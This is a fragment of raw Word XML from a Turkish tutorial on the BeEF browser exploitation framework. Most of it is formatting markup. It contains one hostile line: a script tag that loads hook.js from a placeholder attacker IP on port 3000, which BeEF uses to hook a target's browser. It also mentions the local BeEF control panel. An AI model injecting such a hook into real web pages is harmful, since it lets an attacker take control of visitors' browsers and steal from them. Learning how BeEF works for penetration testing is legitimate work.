      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL’si ile Hedefi Bağlama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A479E4" w14:textId="5C2BD501" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="004265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proofErr w:type="spell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BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spell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hedef tarayıcıya şu </w:t>
      </w:r>
      <w:proofErr w:type="spell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JavaScript</w:t>
      </w:r>
      <w:proofErr w:type="spell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koduyla bağlantı kurar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C41458" w14:textId="5D416BA7" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr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“</w:t>
      </w:r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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spell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script</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spell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src</w:t>
      </w:r>
      <w:proofErr w:type="spell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="http://&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spell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beef</w:t>
      </w:r>
      <w:proofErr w:type="spell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-ip</w:t>
      </w:r>
      <w:proofErr w:type="gram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&gt;:3000/hook.js</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46989EE5" w14:textId="705C3173" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="000A5116">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCE1920" wp14:editId="28E4669D">
            <wp:extent cx="5486400" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="352206954" name="Resim 2" descr="metin, ekran görüntüsü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206954" name="Resim 2" descr="metin, ekran görüntüsü, yazı tipi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B395" w14:textId="77777777" w:rsidR="000A5116" w:rsidRPr="00426590" w:rsidRDefault="000A5116">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4557C6C8" w14:textId="5371BD46" w:rsidR="00426590" w:rsidRPr="00426590" w:rsidRDefault="00426590" w:rsidP="00426590">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2037"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00426590">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00426590" w:rsidRPr="0042659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396066" w14:textId="77777777" w:rsidR="00326C27" w:rsidRDefault="00326C27" w:rsidP="000A5116">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2F1C3C0C" w14:textId="77777777" w:rsidR="00326C27" w:rsidRDefault="00326C27" w:rsidP="000A51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675FD" w14:textId="77777777" w:rsidR="00326C27" w:rsidRDefault="00326C27" w:rsidP="000A5116">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="255374FF" w14:textId="77777777" w:rsidR="00326C27" w:rsidRDefault="00326C27" w:rsidP="000A51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8F91" w14:textId="63EFF1D2" w:rsidR="000A5116" w:rsidRDefault="000A5116">
    <w:pPr>
      <w:pStyle w:val="stBilgi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595066"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56FEC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D04B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5684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099638">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1380084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16"/>
    <w:rsid w:val="000A5116"/>
    <w:rsid w:val="00326C27"/>
    <w:rsid w:val="00411558"/>
    <w:rsid w:val="00426590"/>
    <w:rsid w:val="005B72A9"/>
    <w:rsid w:val="007F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8EF69B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4763C0DE-23CD-A44F-A174-5D217A72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A5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A5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A5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A5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A5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A511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A511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A511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A511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A5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A5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A5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0A511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A511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A511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A511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A511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A511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A51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A5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A511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A5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A511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A511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A511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A511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A5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A511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A5116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A5116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0A5116"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AltBilgi">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AltBilgiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A5116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0A5116"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p1">
    <w:name w:val="p1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000A5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customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="000A5116"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p2">
    <w:name w:val="p2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000A5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paragraph" w:customStyle="1" w:styleId="p3">
    <w:name w:val="p3"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000A511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unhideWhenUsed/>
    <w:rsid w:val="00426590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426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127.0.0.1:3000/ui/pane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Hoşgör</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ozan Hoşgör</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-29T12:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-29T12:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>